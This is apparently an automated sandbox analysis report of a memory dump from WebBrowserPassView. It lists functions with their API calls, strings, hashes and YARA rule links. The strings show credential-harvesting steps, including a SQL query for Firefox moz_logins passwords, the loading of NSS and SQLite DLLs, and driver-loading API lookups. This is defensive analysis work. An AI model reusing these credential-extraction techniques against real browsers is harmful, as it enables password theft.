Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004118EA, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992

Strings

NtOpenSymbolicLinkObject, xrefs: 0041193A
NtResumeProcess, xrefs: 00411982
NtQueryObject, xrefs: 0041195E
ntdll.dll, xrefs: 004118F8
NtQuerySystemInformation, xrefs: 00411909
NtSuspendProcess, xrefs: 00411970
NtUnloadDriver, xrefs: 00411928
NtLoadDriver, xrefs: 00411916
NtQuerySymbolicLinkObject, xrefs: 0041194C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D399, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D3BA
memset.MSVCRT ref: 0040D3E4
memset.MSVCRT ref: 0040D3FA
memset.MSVCRT ref: 0040D410
_snwprintf.MSVCRT ref: 0040D449
wcscpy.MSVCRT ref: 0040D494
_snwprintf.MSVCRT ref: 0040D521
wcscat.MSVCRT ref: 0040D553

Part of subcall function 00414777: _snwprintf.MSVCRT ref: 0041479B

wcscpy.MSVCRT ref: 0040D535
_snwprintf.MSVCRT ref: 0040D592

Strings

<font color="%s">%s</font>, xrefs: 0040D514
bgcolor="%s", xrefs: 0040D43B
</table><p>, xrefs: 0040D5B6
<table border="1" cellpadding="5">, xrefs: 0040D451
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040D3C2
nowrap, xrefs: 0040D48E
 , xrefs: 0040D54D

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9D6, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D9FC
memset.MSVCRT ref: 0040DA11
memset.MSVCRT ref: 0040DA26
_snwprintf.MSVCRT ref: 0040DA55
_snwprintf.MSVCRT ref: 0040DA84
wcscpy.MSVCRT ref: 0040DA95
_snwprintf.MSVCRT ref: 0040DAB5
memset.MSVCRT ref: 0040DAF4
_snwprintf.MSVCRT ref: 0040DB15
_snwprintf.MSVCRT ref: 0040DB4F

Part of subcall function 00414777: _snwprintf.MSVCRT ref: 0041479B

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 0040DAA4
bgcolor="%s", xrefs: 0040DA44
<font color="%s">, xrefs: 0040DA73
<th%s>%s%s%s, xrefs: 0040DB3E
</font>, xrefs: 0040DA8F
width="%s", xrefs: 0040DB04

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65

Uniqueness

Uniqueness Score: -1.00%

Function 00407737, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
??2@YAPAXI@Z.MSVCRT ref: 00407774

Part of subcall function 0040897D: ReadFile.KERNEL32(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994

memset.MSVCRT ref: 004077A6
memset.MSVCRT ref: 004077C8
memset.MSVCRT ref: 004077DD
strcmp.MSVCRT ref: 0040781C
strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
memset.MSVCRT ref: 004078E5
strcmp.MSVCRT ref: 00407949
??3@YAXPAX@Z.MSVCRT ref: 0040797B
CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984

Strings

---, xrefs: 00407943

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3751793120-2854292027
Opcode ID: eca26216cdaf4081c7745029d8611b0e3050f967057ef2bb3d745bbd903b7043
Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
Opcode Fuzzy Hash: eca26216cdaf4081c7745029d8611b0e3050f967057ef2bb3d745bbd903b7043
Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F99D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 166windowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32(?,00000001), ref: 0040FA22
SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
SelectObject.GDI32(?,?), ref: 0040FA45
DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
SelectObject.GDI32(00000014,00000005), ref: 0040FA85

Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
Part of subcall function 0040F7F1: GetSubMenu.USER32 ref: 0040F809
Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A

GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
SetCursor.USER32(00000000), ref: 0040FAB0
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
memcpy.MSVCRT ref: 0040FB3D

Strings

WebBrowserPassView, xrefs: 0040FABE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
String ID: WebBrowserPassView
API String ID: 3991541706-2171583229
Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E8, Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 0040EA07
GetWindowRect.USER32 ref: 0040EA1D
GetWindowRect.USER32 ref: 0040EA33
GetDlgItem.USER32 ref: 0040EA6D
GetWindowRect.USER32 ref: 0040EA74
MapWindowPoints.USER32 ref: 0040EA84
BeginDeferWindowPos.USER32 ref: 0040EAA8
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040EACB
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040EAEA
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040EB15
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040EB2D
EndDeferWindowPos.USER32(?), ref: 0040EB32

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040A230, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250

Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8

GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280

Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0

memcpy.MSVCRT ref: 0040A2C7
strchr.MSVCRT ref: 0040A2EC
strchr.MSVCRT ref: 0040A2FD
_strlwr.MSVCRT ref: 0040A30B
memset.MSVCRT ref: 0040A326
CloseHandle.KERNEL32(00000000), ref: 0040A373

Strings

4, xrefs: 0040A274
h, xrefs: 0040A2D8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69

Uniqueness

Uniqueness Score: -1.00%

Function 004055D0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004055F3
KillTimer.USER32(?,00000041), ref: 00405603
KillTimer.USER32(?,00000041), ref: 00405614
GetTickCount.KERNEL32 ref: 00405637
GetParent.USER32(?), ref: 00405662
SendMessageW.USER32(00000000), ref: 00405669
BeginDeferWindowPos.USER32 ref: 00405677
EndDeferWindowPos.USER32(00000000), ref: 004056C7
InvalidateRect.USER32(?,?,00000001), ref: 004056D3

Strings

A, xrefs: 0040561F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
Instruction ID: 7dfccb24d1e076f690be31caf06a6d4f547633615caf0f8568b2f3749d1e3a55
Opcode Fuzzy Hash: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
Instruction Fuzzy Hash: 1D317E75640B04BBEB201F659C85F6B7B6AFB44741F50883AF30A7A1E1C7F698908E58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E29C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E2D4
memset.MSVCRT ref: 0040E2E9
memset.MSVCRT ref: 0040E2FE
_snwprintf.MSVCRT ref: 0040E326
wcscpy.MSVCRT ref: 0040E342
_snwprintf.MSVCRT ref: 0040E385

Strings

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
<table dir="rtl"><tr><td>, xrefs: 0040E33C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
Instruction ID: dd7614801a102cad1738161c6781c4b5767366b5b9f47406b9b80e8d834f6cb8
Opcode Fuzzy Hash: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
Instruction Fuzzy Hash: C82154B69002186BDB21EBA5CC45F9A77BCEF4D785F0440AAF50893151DB38DB848B59

Uniqueness

Uniqueness Score: -1.00%

Function 00413031, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0041304A
wcscpy.MSVCRT ref: 0041305A

Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3

wcscpy.MSVCRT ref: 004130A9
wcscat.MSVCRT ref: 004130B4
memset.MSVCRT ref: 00413090

Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489

memset.MSVCRT ref: 004130D8
memcpy.MSVCRT ref: 004130F3
wcscat.MSVCRT ref: 004130FF

Strings

\systemroot, xrefs: 00413067

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
Instruction ID: 36f3f6f0360cce9f0c7183545ae4e1e5b3fba08c84210a6b9e93ac32fafd8b1c
Opcode Fuzzy Hash: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
Instruction Fuzzy Hash: 9A21D7B640530469E721EBB19C86FEB63EC9F46715F20415FB115A2082FB7CAA84475E

Uniqueness

Uniqueness Score: -1.00%

Function 0040744D, Relevance: 16.8, APIs: 10, Strings: 1, Instructions: 251stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB

memset.MSVCRT ref: 0040748C

Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77

memset.MSVCRT ref: 0040750B
memset.MSVCRT ref: 00407520
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
memset.MSVCRT ref: 004076E0

Strings

SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
API String ID: 2096775815-1337997248
Opcode ID: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
Instruction ID: 3c2b171134edc849c89bfde98875369ff40149e6fc896e2c8c158776e68e1888
Opcode Fuzzy Hash: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
Instruction Fuzzy Hash: 61912A72C0425EAFDF10DF94DC819DEBBB4EF04315F10406BE505B2191EA39AA94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004144DA, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0041454D

Strings

Favorites, xrefs: 0041450C
AppData, xrefs: 00414532
Common Start Menu, xrefs: 0041451A
Common Startup, xrefs: 00414540
Programs, xrefs: 00414513
Startup, xrefs: 00414505
Desktop, xrefs: 004144F7
Common Desktop, xrefs: 00414539
Start Menu, xrefs: 004144FE
Common Programs, xrefs: 00414547

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 1284135714-318151290
Opcode ID: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
Instruction ID: 0ebae4f713cd0728fe49c3fef23c10be13eea51f6af137ba8aced86fbfd041bd
Opcode Fuzzy Hash: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
Instruction Fuzzy Hash: 59F0BBB169462D73342E25B85806AF70483F0C1B0537E45537702EA6D6EA4CCAC1E89F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B478, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040B48E
memset.MSVCRT ref: 0040B4B2
GetMenuItemInfoW.USER32 ref: 0040B4ED
memset.MSVCRT ref: 0040B51C
wcschr.MSVCRT ref: 0040B528
wcscat.MSVCRT ref: 0040B583
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040B59F

Strings

0, xrefs: 0040B4CD
6, xrefs: 0040B4D8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
Instruction ID: bceec671b1c8862383177497c079c71e13407bcb6d3a60011dae78a89f936b1e
Opcode Fuzzy Hash: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
Instruction Fuzzy Hash: 65315BB2408340AFDB109F95DC44A9BB7E8FF89318F00487FF948A2291D779D905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041171B, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
GetModuleHandleW.KERNEL32(sqlite3.dll,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411733
GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411752
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411759

Strings

mozsqlite3.dll, xrefs: 00411735
sqlite3.dll, xrefs: 0041172C
nss3.dll, xrefs: 00411725

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHandleLibraryModule
String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
API String ID: 662261464-3550686275
Opcode ID: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
Instruction ID: e2ab39130582ef49d5f09875a9cbab8dc3c3c45014a759ddc4c6379760142a6f
Opcode Fuzzy Hash: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
Instruction Fuzzy Hash: 7AE04F66F4136DA79A1027F66C84EAB6F5CC896AA13150037AF05A33519EA89C018AF9

Uniqueness

Uniqueness Score: -1.00%

Function 004440EA, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00444125
memcpy.MSVCRT ref: 004441C9
memcpy.MSVCRT ref: 004441DB
memcpy.MSVCRT ref: 00444203
memcpy.MSVCRT ref: 00444215
memcpy.MSVCRT ref: 00444227
memcpy.MSVCRT ref: 00444276
memset.MSVCRT ref: 004442C4

Strings

UCD, xrefs: 00444117, 004442DE, 0044414D, 00444197, 0044411F
UCD, xrefs: 00444272, 0044427E, 00444275, 00444281

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memchrmemset
String ID: UCD$UCD
API String ID: 1581201632-670880344
Opcode ID: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
Instruction ID: 346eebee7d7e8b6f8d140da3993cfc901939ed9edb34b9035315ebb9ce6523fc
Opcode Fuzzy Hash: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
Instruction Fuzzy Hash: 8551D3719001195BEB10EFA8CC95FEEB7B8AF85300F0444ABF955E7281E778E644CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004085D0, Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004085E9
GetSystemMetrics.USER32 ref: 004085EF
GetDC.USER32(00000000), ref: 004085FC
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
ReleaseDC.USER32 ref: 0040861B
GetWindowRect.USER32 ref: 0040862E
GetParent.USER32(?), ref: 00408633
GetWindowRect.USER32 ref: 00408650
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
Instruction ID: 6b5921239ffcae24bde8aad05d59603f054fe97e3a0e5988cf4f66e7c2dd28aa
Opcode Fuzzy Hash: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
Instruction Fuzzy Hash: 2E31A475A00609AFDF04CFB8CD85AEEBBB9FB48350F050539E901F3291DA71ED418A94

Uniqueness

Uniqueness Score: -1.00%

Function 0040C33A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166

??2@YAPAXI@Z.MSVCRT ref: 0040C37A
??2@YAPAXI@Z.MSVCRT ref: 0040C396
memcpy.MSVCRT ref: 0040C3BB
memcpy.MSVCRT ref: 0040C3CF
??2@YAPAXI@Z.MSVCRT ref: 0040C452
??2@YAPAXI@Z.MSVCRT ref: 0040C45C
??2@YAPAXI@Z.MSVCRT ref: 0040C494

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

Strings

d, xrefs: 0040C473
8"E, xrefs: 0040C3A7, 0040C3C0, 0040C41C, 0040C3B1, 0040C3C8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: 8"E$d
API String ID: 1140211610-2418960419
